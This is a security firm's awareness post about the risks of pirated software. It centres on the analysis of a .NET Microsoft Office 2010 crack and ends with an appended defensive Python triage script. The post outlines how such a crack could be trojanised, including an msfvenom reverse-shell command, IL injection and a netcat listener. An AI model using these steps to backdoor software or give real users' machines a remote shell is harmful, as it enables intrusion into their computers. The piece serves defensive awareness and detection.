CSP-CERT® Resources:
The Danger of Using Pirated Software

by Nathu Nandwani
posted October 2018

CSP CERT® at 1st Anti-Media Piracy Summit

(Manila/Philippines) Our Chief Strategy Officer emphasized the cyber risk of using pirated software at the recently concluded Anti-Media Piracy Summit. In this article, our Red Team Vulnerability Research Group highlights what can happen when you use pirated software.

Software piracy is quite prevalent in the Philippines. In a typical scenario, if you have a tech-related problem that requires a software application and you ask a friend for help, whether that friend works in technology or is simply an enthusiast, chances are you will end up with a pirated copy of that application. According to a study by the Business Software Alliance (BSA), 64% of the software applications in the Philippines as of 2017 are unlicensed. That means roughly 6 out of every 10 applications are unlicensed, and that percentage corresponds to around $388 million in commercial value.

Even though the Philippine government has already enacted a law that penalizes violators, the issue is still common. For instance, a few days ago, a Reddit user posted a picture of a computer used in a local transport area showing a pop-up that says its Windows version is not genuine. While this is clearly a legal concern, it also points to cyber security issues.

When using pirated software applications, the term "crack" is commonly heard. A "crack" is a program that patches a trial version of a software application to extend its usage and remove feature limitations. The issue is that even though some of these "cracks" work as expected, they can contain malicious code that leaves the computer open to attackers.

An example of this is a pirated version of Microsoft Office 2010. After examining a "crack" for Microsoft Office 2010, it turned out that the tool was written in a programming language based on the .NET framework, since a .NET decompiler was able to recover its intermediate language (IL) code.


Seeing that this toolkit has a class named "CMemoryExecute" should already raise suspicion: this module executes a byte array directly in memory by hijacking another process, a technique usually found in encryption tools that are used to run encrypted malware.


This also means that this toolkit can easily be customized to include malicious code (if it doesn't already) by taking advantage of that module, through the following steps:

  1. Generate a reverse shell through msfvenom: msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=443 -f exe > ~/Desktop/test.exe
  2. Inject intermediate language (IL) code into the toolkit’s entry point to execute the reverse shell:
  3. Once the code has been injected and the toolkit has been recompiled, if the so-called "crack" runs on a machine that ships with that reverse shell named "test.exe", the shell gets injected into memory as vbc.exe, which is the hijacked process in this case:
  4. If the attacker is listening through netcat, the connection goes through and the user who ran the toolkit to get a pirated Microsoft Office gets hacked in return.

While the scenario above requires the malware (test.exe) to be shipped together with the toolkit, a more advanced version could carry the executable inside the toolkit itself, for example by storing it in its resources. In general, this can happen to any .NET compiled program, but because most users choose pirated software applications instead of buying them, the chance of being infected by a malicious actor is high. Therefore, investing in a licensed software application is still advantageous compared to using pirated ones, unless of course the user is willing to risk getting hacked, getting condemned by the government, or simply suffering those annoying random crashes without being able to do anything about them because support isn't available.
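As an added, defender-side illustration (not code from this article or from CSP-CERT), the following Python triage script applies the two indicators discussed above to a file before anyone runs it: the presence of names such as CMemoryExecute, the target process vbc.exe, or the process-hijacking APIs such a module needs, and a second PE image embedded inside the file, which is how a payload stored in the resources would appear. The API list beyond the article's own names is an assumption, and the sample inputs are constructed PE-shaped stubs, not real crack files.

```python
import re
import struct

# Indicators from the article (CMemoryExecute, vbc.exe) plus Win32 APIs that an
# "execute a byte array in another process" module typically imports (assumed list).
MARKERS = ("CMemoryExecute", "vbc.exe", "WriteProcessMemory",
           "NtUnmapViewOfSection", "ResumeThread")


def make_stub_pe(body: bytes) -> bytes:
    """Build a PE-shaped blob (MZ header, e_lfanew -> 'PE\\0\\0', then body).
    Constructed test data only; it is not a runnable executable."""
    hdr = bytearray(0x80)
    hdr[:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x80)      # e_lfanew points just past the stub header
    return bytes(hdr) + b"PE\0\0" + body


def find_embedded_pe(data: bytes) -> list:
    """Offsets of PE images found after the host image (e.g. a payload kept in resources)."""
    hits = []
    for m in re.finditer(b"MZ", data):
        off = m.start()
        if off == 0 or off + 0x40 > len(data):
            continue                              # skip the host image and truncated tails
        e_lfanew = struct.unpack_from("<I", data, off + 0x3C)[0]
        pe = off + e_lfanew
        if 0x40 <= e_lfanew < 0x1000 and data[pe:pe + 4] == b"PE\0\0":
            hits.append(off)
    return hits


def find_markers(data: bytes) -> list:
    """Match each marker as UTF-8 (.NET #Strings heap: type and method names)
    and as UTF-16LE (.NET #US heap: string literals such as a target process name)."""
    return [s for s in MARKERS
            if s.encode() in data or s.encode("utf-16-le") in data]


def triage(data: bytes) -> dict:
    """Flag a file that carries a second PE image or two or more in-memory-execution markers."""
    markers, embedded = find_markers(data), find_embedded_pe(data)
    return {"markers": markers, "embedded_pe": embedded,
            "suspicious": bool(embedded) or len(markers) >= 2}


# Constructed samples: a "crack" that names the loader class, targets vbc.exe and
# carries a second executable in its body, versus a benign-looking file.
SAMPLE_CRACK = make_stub_pe(
    b"\0" * 16 + b"CMemoryExecute\0" + "vbc.exe\0".encode("utf-16-le")
    + b"WriteProcessMemory\0" + make_stub_pe(b"second image"))
SAMPLE_CLEAN = make_stub_pe(b"\0" * 16 + b"Hello, World\0")

if __name__ == "__main__":
    for name, blob in (("crack", SAMPLE_CRACK), ("clean", SAMPLE_CLEAN)):
        print(name, triage(blob))
```

Run it against a real file with `triage(open(path, "rb").read())`; a hit is a reason to look at the decompiled IL, not a verdict on its own.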


Other Resources:

Sunshine TV's feature about Anti-Media Piracy.